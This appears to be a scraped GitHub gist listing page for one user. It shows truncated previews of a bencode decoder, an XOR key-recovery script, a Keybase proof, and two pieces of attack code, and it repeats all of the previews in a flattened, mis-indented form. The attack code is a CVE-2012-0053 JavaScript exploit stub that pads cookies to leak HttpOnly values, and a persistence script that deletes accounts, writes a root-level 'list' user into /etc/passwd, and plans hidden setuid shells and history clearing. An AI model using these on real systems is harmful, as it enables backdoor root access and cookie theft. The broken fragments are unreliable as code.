Scott Behrens sbehrens

## gist:3427871

def decode_string(x, f):
    colon = x.index(':', f)
    try:
        n = int(x[f:colon])
    except (OverflowError, ValueError):
        n = long(x[f:colon])
    if x[f] == '0' and colon != f+1:
        raise ValueError
    colon += 1

## stream_cipher.py
import array
import base64
import copy

# Found X0R cipher on an app assessment?  Got the ciphertext and know the plaintext?  Use this to get the key.

cipher_text = array.array('B', base64.b64decode("Some Blob of base64 encoded ciphertext remove decoder if not base64"))

plain_text = array.array('B', "some known plaintext value")

## CVE-2012-0053.js
(function(d){
	desired_length = 8192;
	for(cookie_val = '=';cookie_val.length<=97;cookie_val+="A"){};
	for(i=100;(desired_length-d.cookie.length)>111;i++,d.cookie=i+cookie_val){};
	for(cookie_val="999=";(cookie_val.length + d.cookie.length + 9) <= desired_length;cookie_val += "A"){};
	d.cookie = cookie_val;
	d.cookie = "888=8";
	x = new XMLHttpRequest();
	x.onreadystatechange = function(){
		if (x.readyState == 4 && x.status == 400){

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                sbehrens
                / keybase.md
            
            
              Created
              January 13, 2019 16:51
            
          
    Keybase proof

I hereby claim:

I am sbehrens on github.
I am arbit (https://keybase.io/arbit) on keybase.
I have a public key whose fingerprint is 3BCB 4364 EF4A 3F6A C890  A755 18B8 EFD6 D8EE 14EA

To claim this, I am signing this object:

  
## cmd_wrapper.bash
# TODO
# copy binarys to new location, execute from said location. ensure ps command filters out commands

#PORT="1337"


# Add users, cat ssh key for ssh key access, clear history, copy shells with sguid bit set to hidden files for later use
deluser news  > /dev/null 2>&1
deluser list > /dev/null 2>&1
sed '7ilist:x:0:0:list,,,,:/:/bin/bash' /etc/passwd > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt

	def decode_string(x, f):
	colon = x.index(':', f)
	try:
	n = int(x[f:colon])
	except (OverflowError, ValueError):
	n = long(x[f:colon])
	if x[f] == '0' and colon != f+1:
	raise ValueError
	colon += 1
	import array
	import base64
	import copy

	# Found X0R cipher on an app assessment? Got the ciphertext and know the plaintext? Use this to get the key.

	cipher_text = array.array('B', base64.b64decode("Some Blob of base64 encoded ciphertext remove decoder if not base64"))

	plain_text = array.array('B', "some known plaintext value")
	(function(d){
	desired_length = 8192;
	for(cookie_val = '=';cookie_val.length<=97;cookie_val+="A"){};
	for(i=100;(desired_length-d.cookie.length)>111;i++,d.cookie=i+cookie_val){};
	for(cookie_val="999=";(cookie_val.length + d.cookie.length + 9) <= desired_length;cookie_val += "A"){};
	d.cookie = cookie_val;
	d.cookie = "888=8";
	x = new XMLHttpRequest();
	x.onreadystatechange = function(){
	if (x.readyState == 4 && x.status == 400){
	# TODO
	# copy binarys to new location, execute from said location. ensure ps command filters out commands

	#PORT="1337"


	# Add users, cat ssh key for ssh key access, clear history, copy shells with sguid bit set to hidden files for later use
	deluser news > /dev/null 2>&1
	deluser list > /dev/null 2>&1
	sed '7ilist:x:0:0:list,,,,:/:/bin/bash' /etc/passwd > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt